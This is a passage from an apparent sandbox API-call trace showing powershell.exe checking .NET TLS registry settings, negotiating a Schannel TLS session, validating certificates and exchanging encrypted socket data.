CloseHandle (hObject=0x730) returned 1 Thread: id = 13 os_tid = 0x13e8 [0150.086] WSAEnumNetworkEvents (in: s=0x894, hEventObject=0x8a4, lpNetworkEvents=0xb15647f2d0 | out: lpNetworkEvents=0xb15647f2d0) returned 0 [0150.087] WSAEventSelect (s=0x894, hEventObject=0x0, lNetworkEvents=0) returned 0 [0150.087] ResetEvent (hEvent=0x8a4) returned 1 [0150.087] ioctlsocket (in: s=0x894, cmd=-2147195266, argp=0xb15647f300 | out: argp=0xb15647f300) returned 0 [0150.097] closesocket (s=0x898) returned 0 [0150.208] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0xb15647eb98 | out: phkResult=0xb15647eb98*=0x8e8) returned 0x0 [0150.208] RegQueryValueExW (in: hKey=0x8e8, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0xb15647ebd8, lpData=0x0, lpcbData=0xb15647ebd0*=0x0 | out: lpType=0xb15647ebd8*=0x4, lpData=0x0, lpcbData=0xb15647ebd0*=0x4) returned 0x0 [0150.208] RegQueryValueExW (in: hKey=0x8e8, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0xb15647ebd8, lpData=0xb15647ebb8, lpcbData=0xb15647ebd0*=0x4 | out: lpType=0xb15647ebd8*=0x4, lpData=0xb15647ebb8*=0x1, lpcbData=0xb15647ebd0*=0x4) returned 0x0 [0150.211] RegQueryValueExW (in: hKey=0x8e8, lpValueName="SchUseStrongCrypto", lpReserved=0x0, lpType=0xb15647ec48, lpData=0x0, lpcbData=0xb15647ec40*=0x0 | out: lpType=0xb15647ec48*=0x4, lpData=0x0, lpcbData=0xb15647ec40*=0x4) returned 0x0 [0150.213] RegCloseKey (hKey=0x8e8) returned 0x0 [0150.217] GetCurrentProcessId () returned 0x12c4 [0150.217] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x12c4) returned 0x8e8 [0150.218] EnumProcessModules (in: hProcess=0x8e8, lphModule=0x1e3396733d0, cb=0x200, lpcbNeeded=0xb15647eba0 | out: lphModule=0x1e3396733d0, lpcbNeeded=0xb15647eba0) returned 1 [0150.219] EnumProcessModules (in: hProcess=0x8e8, lphModule=0x1e3396735e8, cb=0x400, lpcbNeeded=0xb15647eba0 | out: lphModule=0x1e3396735e8, lpcbNeeded=0xb15647eba0) returned 1 [0150.222] GetModuleInformation (in: hProcess=0x8e8, hModule=0x7ff6cf2d0000, lpmodinfo=0x1e339673a58, cb=0x18 | out: lpmodinfo=0x1e339673a58*(lpBaseOfDll=0x7ff6cf2d0000, SizeOfImage=0x78000, EntryPoint=0x7ff6cf2d31a0)) returned 1 [0150.222] CoTaskMemAlloc (cb=0x804) returned 0x1e3513a5940 [0150.222] GetModuleBaseNameW (in: hProcess=0x8e8, hModule=0x7ff6cf2d0000, lpBaseName=0x1e3513a5940, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0150.223] CoTaskMemFree (pv=0x1e3513a5940) [0150.223] CoTaskMemAlloc (cb=0x804) returned 0x1e3513a5940 [0150.223] GetModuleFileNameExW (in: hProcess=0x8e8, hModule=0x7ff6cf2d0000, lpFilename=0x1e3513a5940, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0150.223] CoTaskMemFree (pv=0x1e3513a5940) [0150.223] CloseHandle (hObject=0x8e8) returned 1 [0150.223] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0xb15647e6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0150.224] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SecurityProtocol", ulOptions=0x0, samDesired=0x20019, phkResult=0xb15647eb98 | out: phkResult=0xb15647eb98*=0x0) returned 0x2 [0150.235] GetCurrentProcessId () returned 0x12c4 [0150.235] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x12c4) returned 0x8e8 [0150.235] EnumProcessModules (in: hProcess=0x8e8, lphModule=0x1e339676a68, cb=0x200, lpcbNeeded=0xb15647ebb0 | out: lphModule=0x1e339676a68, lpcbNeeded=0xb15647ebb0) returned 1 [0150.237] EnumProcessModules (in: hProcess=0x8e8, lphModule=0x1e339676c80, cb=0x400, lpcbNeeded=0xb15647ebb0 | out: lphModule=0x1e339676c80, lpcbNeeded=0xb15647ebb0) returned 1 [0150.239] GetModuleInformation (in: hProcess=0x8e8, hModule=0x7ff6cf2d0000, lpmodinfo=0x1e3396770f0, cb=0x18 | out: lpmodinfo=0x1e3396770f0*(lpBaseOfDll=0x7ff6cf2d0000, SizeOfImage=0x78000, EntryPoint=0x7ff6cf2d31a0)) returned 1 [0150.239] CoTaskMemAlloc (cb=0x804) returned 0x1e3513a28e0 [0150.239] GetModuleBaseNameW (in: hProcess=0x8e8, hModule=0x7ff6cf2d0000, lpBaseName=0x1e3513a28e0, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe [0150.239] CoTaskMemFree (pv=0x1e3513a28e0) [0150.239] CoTaskMemAlloc (cb=0x804) returned 0x1e3513a28e0 [0150.239] GetModuleFileNameExW (in: hProcess=0x8e8, hModule=0x7ff6cf2d0000, lpFilename=0x1e3513a28e0, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0150.240] CoTaskMemFree (pv=0x1e3513a28e0) [0150.240] CloseHandle (hObject=0x8e8) returned 1 [0150.240] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", nBufferLength=0x105, lpBuffer=0xb15647e6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpFilePart=0x0) returned 0x39 [0150.240] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319\\System.Net.ServicePointManager.SchSendAuxRecord", ulOptions=0x0, samDesired=0x20019, phkResult=0xb15647eba8 | out: phkResult=0xb15647eba8*=0x0) returned 0x2 [0150.241] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\v4.0.30319", ulOptions=0x0, samDesired=0x20019, phkResult=0xb15647eba8 | out: phkResult=0xb15647eba8*=0x8e8) returned 0x0 [0150.241] RegQueryValueExW (in: hKey=0x8e8, lpValueName="SchSendAuxRecord", lpReserved=0x0, lpType=0xb15647ebe8, lpData=0x0, lpcbData=0xb15647ebe0*=0x0 | out: lpType=0xb15647ebe8*=0x0, lpData=0x0, lpcbData=0xb15647ebe0*=0x0) returned 0x2 [0150.241] RegCloseKey (hKey=0x8e8) returned 0x0 [0150.254] EnumerateSecurityPackagesW (in: pcPackages=0xb15647ec18, ppPackageInfo=0xb15647eb30 | out: pcPackages=0xb15647ec18, ppPackageInfo=0xb15647eb30) returned 0x0 [0150.283] FreeContextBuffer (in: pvContextBuffer=0x1e3513df830 | out: pvContextBuffer=0x1e3513df830) returned 0x0 [0150.296] GetCurrentProcess () returned 0xffffffffffffffff [0150.296] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb15647e768 | out: TokenHandle=0xb15647e768*=0x8f4) returned 1 [0150.301] AcquireCredentialsHandleW (in: pPrincipal=0x0, pPackage=0x1e33967992c, fCredentialUse=0x2, pvLogonId=0x0, pAuthData=0xb15647e8d0, pGetKeyFn=0x0, pvGetKeyArgument=0x0, phCredential=0x1e33967bbb0, ptsExpiry=0xb15647e7f0 | out: phCredential=0x1e33967bbb0, ptsExpiry=0xb15647e7f0) returned 0x0 [0150.316] InitializeSecurityContextW (in: phCredential=0xb15647e7c8, phContext=0x0, pTargetName=0x1e33966f9a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x0, Reserved2=0x0, phNewContext=0x1e33967be68, pOutput=0x1e33967bdc0, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647e7c0 | out: phNewContext=0x1e33967be68, pOutput=0x1e33967bdc0, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647e7c0) returned 0x90312 [0150.317] FreeContextBuffer (in: pvContextBuffer=0x1e35141bd60 | out: pvContextBuffer=0x1e35141bd60) returned 0x0 [0150.322] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffbed570000 [0150.324] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="AppPolicyGetClrCompat", cchWideChar=21, lpMultiByteStr=0xb15647e820, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AppPolicyGetClrCompat", lpUsedDefaultChar=0x0) returned 21 [0150.325] GetProcAddress (hModule=0x7ffbed570000, lpProcName="AppPolicyGetClrCompat") returned 0x0 [0150.325] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffbed570000 [0150.325] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x400, lpWideCharStr="GetCurrentPackageId", cchWideChar=19, lpMultiByteStr=0xb15647e820, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GetCurrentPackageIdat", lpUsedDefaultChar=0x0) returned 19 [0150.325] GetProcAddress (hModule=0x7ffbed570000, lpProcName="GetCurrentPackageId") returned 0x7ffbea418d40 [0150.326] GetCurrentPackageId () returned 0x3d54 [0150.337] WSASend (in: s=0x894, lpBuffers=0x1e33967c460*=((len=0xb1, buf=0x1e33967be90*)), dwBufferCount=0x1, lpNumberOfBytesSent=0xb15647ea00, dwFlags=0x0, lpOverlapped=0x1e33903b1c0, lpCompletionRoutine=0x0 | out: lpNumberOfBytesSent=0xb15647ea00*=0xb1, lpOverlapped=0x1e33903b1c0) returned 0 [0150.355] WSARecv (in: s=0x894, lpBuffers=0x1e33967cb18, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ef00, lpFlags=0xb15647ef60*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e33967cb18*=((len=0x5, buf=0x1e33967be90*)), lpNumberOfBytesRecvd=0xb15647ef00*=0x5, lpFlags=0xb15647ef60*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.357] WSARecv (in: s=0x894, lpBuffers=0x1e33967cff0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e33967cff0*=((len=0x43, buf=0x1e33967be95*)), lpNumberOfBytesRecvd=0xb15647ee50*=0x43, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.358] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e33966f9a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e33967d318, Reserved2=0x0, phNewContext=0x1e33967be68, pOutput=0x1e33967d338, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e33967be68, pOutput=0x1e33967d338, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10) returned 0x90312 [0150.361] WSARecv (in: s=0x894, lpBuffers=0x1e33967d4d8, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee00, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e33967d4d8*=((len=0x5, buf=0x1e33967d428*)), lpNumberOfBytesRecvd=0xb15647ee00*=0x5, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.361] WSARecv (in: s=0x894, lpBuffers=0x1e33967e890, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e33967e890*=((len=0x1079, buf=0x1e33967d76d*)), lpNumberOfBytesRecvd=0xb15647ee50*=0x1079, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.362] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e33966f9a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e33967ebd0, Reserved2=0x0, phNewContext=0x1e33967be68, pOutput=0x1e33967ebf0, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e33967be68, pOutput=0x1e33967ebf0, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10) returned 0x90312 [0150.364] WSARecv (in: s=0x894, lpBuffers=0x1e33967ed90, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee00, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e33967ed90*=((len=0x5, buf=0x1e33967ece0*)), lpNumberOfBytesRecvd=0xb15647ee00*=0x5, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.365] WSARecv (in: s=0x894, lpBuffers=0x1e33967f220, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e33967f220*=((len=0x14d, buf=0x1e33967f025*)), lpNumberOfBytesRecvd=0xb15647ee50*=0x14d, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.365] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e33966f9a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e33967f560, Reserved2=0x0, phNewContext=0x1e33967be68, pOutput=0x1e33967f580, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e33967be68, pOutput=0x1e33967f580, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10) returned 0x90312 [0150.366] WSARecv (in: s=0x894, lpBuffers=0x1e33967f720, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee00, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e33967f720*=((len=0x5, buf=0x1e33967f670*)), lpNumberOfBytesRecvd=0xb15647ee00*=0x5, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.366] WSARecv (in: s=0x894, lpBuffers=0x1e33967fa68, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e33967fa68*=((len=0x4, buf=0x1e33967f9b5*)), lpNumberOfBytesRecvd=0xb15647ee50*=0x4, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.366] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e33966f9a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e33967fda8, Reserved2=0x0, phNewContext=0x1e33967be68, pOutput=0x1e33967fdc8, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e33967be68, pOutput=0x1e33967fdc8, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10) returned 0x90312 [0150.598] FreeContextBuffer (in: pvContextBuffer=0x1e35141e910 | out: pvContextBuffer=0x1e35141e910) returned 0x0 [0150.598] WSASend (in: s=0x894, lpBuffers=0x1e33967ffe0*=((len=0x7e, buf=0x1e33967fe98*)), dwBufferCount=0x1, lpNumberOfBytesSent=0xb15647ee40, dwFlags=0x0, lpOverlapped=0x1e33903b1c0, lpCompletionRoutine=0x0 | out: lpNumberOfBytesSent=0xb15647ee40*=0x7e, lpOverlapped=0x1e33903b1c0) returned 0 [0150.599] WSARecv (in: s=0x894, lpBuffers=0x1e339680300, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ef00, lpFlags=0xb15647ef60*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e339680300*=((len=0x5, buf=0x1e33967fe98*)), lpNumberOfBytesRecvd=0xb15647ef00*=0x0, lpFlags=0xb15647ef60*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.613] WSARecv (in: s=0x894, lpBuffers=0x1e339680708, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e339680708*=((len=0xca, buf=0x1e339680595*)), lpNumberOfBytesRecvd=0xb15647ee50*=0xca, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.613] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e33966f9a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e339680a48, Reserved2=0x0, phNewContext=0x1e33967be68, pOutput=0x1e339680a68, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e33967be68, pOutput=0x1e339680a68, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10) returned 0x90312 [0150.614] WSARecv (in: s=0x894, lpBuffers=0x1e339680c08, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee00, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e339680c08*=((len=0x5, buf=0x1e339680b58*)), lpNumberOfBytesRecvd=0xb15647ee00*=0x5, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.614] WSARecv (in: s=0x894, lpBuffers=0x1e339680f48, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e339680f48*=((len=0x1, buf=0x1e339680e9d*)), lpNumberOfBytesRecvd=0xb15647ee50*=0x1, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.614] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e33966f9a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e339681288, Reserved2=0x0, phNewContext=0x1e33967be68, pOutput=0x1e3396812a8, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e33967be68, pOutput=0x1e3396812a8, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10) returned 0x90312 [0150.615] WSARecv (in: s=0x894, lpBuffers=0x1e339681448, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee00, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e339681448*=((len=0x5, buf=0x1e339681398*)), lpNumberOfBytesRecvd=0xb15647ee00*=0x5, lpFlags=0xb15647ee60*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.615] WSARecv (in: s=0x894, lpBuffers=0x1e3396817b0, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee50, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e3396817b0*=((len=0x28, buf=0x1e3396816dd*)), lpNumberOfBytesRecvd=0xb15647ee50*=0x28, lpFlags=0xb15647eeb0*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.615] InitializeSecurityContextW (in: phCredential=0xb15647ec18, phContext=0xb15647ed40, pTargetName=0x1e33966f9a4, fContextReq=0x8011c, Reserved1=0x0, TargetDataRep=0x10, pInput=0x1e339681af0, Reserved2=0x0, phNewContext=0x1e33967be68, pOutput=0x1e339681b10, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10 | out: phNewContext=0x1e33967be68, pOutput=0x1e339681b10, pfContextAttr=0x1e3396798f8, ptsExpiry=0xb15647ec10) returned 0x0 [0150.644] QueryContextAttributesW (in: phContext=0x1e33967be68, ulAttribute=0x4, pBuffer=0x1e339681c38 | out: pBuffer=0x1e339681c38) returned 0x0 [0150.645] QueryContextAttributesW (in: phContext=0x1e33967be68, ulAttribute=0x5a, pBuffer=0x1e339681cc8 | out: pBuffer=0x1e339681cc8) returned 0x0 [0150.650] QueryContextAttributesW (in: phContext=0x1e33967be68, ulAttribute=0x53, pBuffer=0x1e339682028 | out: pBuffer=0x1e339682028) returned 0x0 [0150.650] CertDuplicateCertificateContext (pCertContext=0x1e3513ed420) returned 0x1e3513ed420 [0150.652] CertDuplicateStore (hCertStore=0x1e35142c4a0) returned 0x1e35142c4a0 [0150.654] CertEnumCertificatesInStore (hCertStore=0x1e35142c4a0, pPrevCertContext=0x0) returned 0x1e3513edc20 [0150.655] CertDuplicateCertificateContext (pCertContext=0x1e3513edc20) returned 0x1e3513edc20 [0150.665] CertEnumCertificatesInStore (hCertStore=0x1e35142c4a0, pPrevCertContext=0x1e3513edc20) returned 0x1e3513ecb20 [0150.666] CertDuplicateCertificateContext (pCertContext=0x1e3513ecb20) returned 0x1e3513ecb20 [0150.666] CertEnumCertificatesInStore (hCertStore=0x1e35142c4a0, pPrevCertContext=0x1e3513ecb20) returned 0x1e3513ed420 [0150.666] CertDuplicateCertificateContext (pCertContext=0x1e3513ed420) returned 0x1e3513ed420 [0150.666] CertEnumCertificatesInStore (hCertStore=0x1e35142c4a0, pPrevCertContext=0x1e3513ed420) returned 0x0 [0150.666] CertCloseStore (hCertStore=0x1e35142c4a0, dwFlags=0x0) returned 1 [0150.666] CertFreeCertificateContext (pCertContext=0x1e3513ed420) returned 1 [0150.685] CertOpenStore (lpszStoreProvider=0x2, dwEncodingType=0x10001, hCryptProv=0x0, dwFlags=0x2204, pvPara=0x0) returned 0x1e35142b050 [0150.688] CertAddCRLLinkToStore (in: hCertStore=0x1e35142b050, pCrlContext=0x1e3513edc20, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0150.689] CertAddCRLLinkToStore (in: hCertStore=0x1e35142b050, pCrlContext=0x1e3513ecb20, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0150.689] CertAddCRLLinkToStore (in: hCertStore=0x1e35142b050, pCrlContext=0x1e3513ed420, dwAddDisposition=0x4, ppStoreContext=0x0 | out: ppStoreContext=0x0) returned 1 [0150.694] CertGetCertificateChain (in: hChainEngine=0x0, pCertContext=0x1e3513ed420, pTime=0xb15647ed30, hAdditionalStore=0x1e35142b050, pChainPara=0xb15647ebc8, dwFlags=0x0, pvReserved=0x0, ppChainContext=0xb15647ebb0 | out: ppChainContext=0xb15647ebb0) returned 1 [0150.697] CertDuplicateCertificateChain (pChainContext=0x1e3512c30a0) returned 0x1e3512c30a0 [0150.698] CertDuplicateCertificateContext (pCertContext=0x1e3513ed420) returned 0x1e3513ed420 [0150.698] CertDuplicateCertificateContext (pCertContext=0x1e3513ecc20) returned 0x1e3513ecc20 [0150.698] CertDuplicateCertificateContext (pCertContext=0x1e3513ec520) returned 0x1e3513ec520 [0150.699] CertDuplicateCertificateContext (pCertContext=0x1e3513edea0) returned 0x1e3513edea0 [0150.704] CertFreeCertificateChain (pChainContext=0x1e3512c30a0) [0150.705] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x1, pChainContext=0x1e3512c30a0, pPolicyPara=0xb15647ee78, pPolicyStatus=0xb15647ee58 | out: pPolicyStatus=0xb15647ee58) returned 1 [0150.705] SetLastError (dwErrCode=0x0) [0150.709] CertVerifyCertificateChainPolicy (in: pszPolicyOID=0x4, pChainContext=0x1e3512c30a0, pPolicyPara=0xb15647ef58, pPolicyStatus=0xb15647eea8 | out: pPolicyStatus=0xb15647eea8) returned 1 [0150.727] CertFreeCertificateChain (pChainContext=0x1e3512c30a0) [0150.727] CertFreeCertificateContext (pCertContext=0x1e3513ed420) returned 1 [0150.734] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0xb15647dab0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.734] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0xb15647dab0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.734] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_Disabled", lpBuffer=0xb15647dab0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.734] GetEnvironmentVariableW (in: lpName="PinnableBufferCache_System.Net.SslStream_MinCount", lpBuffer=0xb15647dab0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0150.737] EncryptMessage (in: phContext=0x1e33967be68, fQOP=0x0, pMessage=0x1e33968b168, MessageSeqNo=0x0 | out: pMessage=0x1e33968b168) returned 0x0 [0150.738] WSASend (in: s=0x894, lpBuffers=0x1e33968b2e8*=((len=0xbb, buf=0x1e339689bb8*)), dwBufferCount=0x1, lpNumberOfBytesSent=0xb15647eaf0, dwFlags=0x0, lpOverlapped=0x1e33903b1c0, lpCompletionRoutine=0x0 | out: lpNumberOfBytesSent=0xb15647eaf0*=0xbb, lpOverlapped=0x1e33903b1c0) returned 0 [0150.763] WSARecv (in: s=0x894, lpBuffers=0x1e33969bb18, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647e9e0, lpFlags=0xb15647ea40*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e33969bb18*=((len=0x5, buf=0x1e339697a50*)), lpNumberOfBytesRecvd=0xb15647e9e0*=0x0, lpFlags=0xb15647ea40*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.805] WSARecv (in: s=0x894, lpBuffers=0x1e33969be78, dwBufferCount=0x1, lpNumberOfBytesRecvd=0xb15647ee40, lpFlags=0xb15647eea0*=0x0, lpOverlapped=0x1e33903b150, lpCompletionRoutine=0x0 | out: lpBuffers=0x1e33969be78*=((len=0x3d3, buf=0x1e339697a55*)), lpNumberOfBytesRecvd=0xb15647ee40*=0x3d3, lpFlags=0xb15647eea0*=0x0, lpOverlapped=0x1e33903b150) returned 0 [0150.807] DecryptMessage (in: phContext=0x1e33967be68, pMessage=0x1e33969c170, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33969c170, pfQOP=0x0) returned 0x0 [0150.925] GetCurrentProcess () returned 0xffffffffffffffff [0150.925] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb15647e468 | out: TokenHandle=0xb15647e468*=0x9a8) returned 1 [0150.927] GetCurrentProcess () returned 0xffffffffffffffff [0150.927] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xb15647e478 | out: TokenHandle=0xb15647e478*=0x9b0) returned 1 [0150.934] setsockopt (s=0x894, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0150.934] QueryPerformanceCounter (in: lpPerformanceCount=0xb15647eb58 | out: lpPerformanceCount=0xb15647eb58*=3492755105407) returned 1 [0150.934] QueryPerformanceCounter (in: lpPerformanceCount=0xb15647eae8 | out: lpPerformanceCount=0xb15647eae8*=3492755112433) returned 1 [0150.939] QueryPerformanceCounter (in: lpPerformanceCount=0xb15647eae8 | out: lpPerformanceCount=0xb15647eae8*=3492755678065) returned 1 [0150.940] recv (in: s=0x894, buf=0x1e339697a50, len=5, flags=0 | out: buf=0x1e339697a50*) returned 5 [0150.940] recv (in: s=0x894, buf=0x1e339697a55, len=29, flags=0 | out: buf=0x1e339697a55*) returned 29 [0150.943] DecryptMessage (in: phContext=0x1e33967be68, pMessage=0x1e33969fa50, MessageSeqNo=0x0, pfQOP=0x0 | out: pMessage=0x1e33969fa50, pfQOP=0x0) returned 0x0 [0150.945] SetEvent (hEvent=0x77c) returned 1 [0150.945] QueryPerformanceCounter (in: lpPerformanceCount=0xb15647eac8 | out: lpPerformanceCount=0xb15647eac8*=3492756264518) returned 1 [0150.955] select (in: nfds=0, readfds=0x1e3396a0200, writefds=0x0, exceptfds=0x0, timeout=0xb15647ead8*(tv_sec=0, tv_usec=0) | out: readfds=0x1e3396a0200, writefds=0x0, exceptfds=0x0) returned 0 [0150.963] EncryptMessage (in: phContext=0x1e33967be68, fQOP=0x0, pMessage=0x1e3396a07e8, MessageSeqNo=0x0 | out: pMessage=0x1e3396a07e8) returned 0x0 [0150.963] WSASend (in: s=0x894, lpBuffers=0x1e3396a0968*=((len=0xa7, 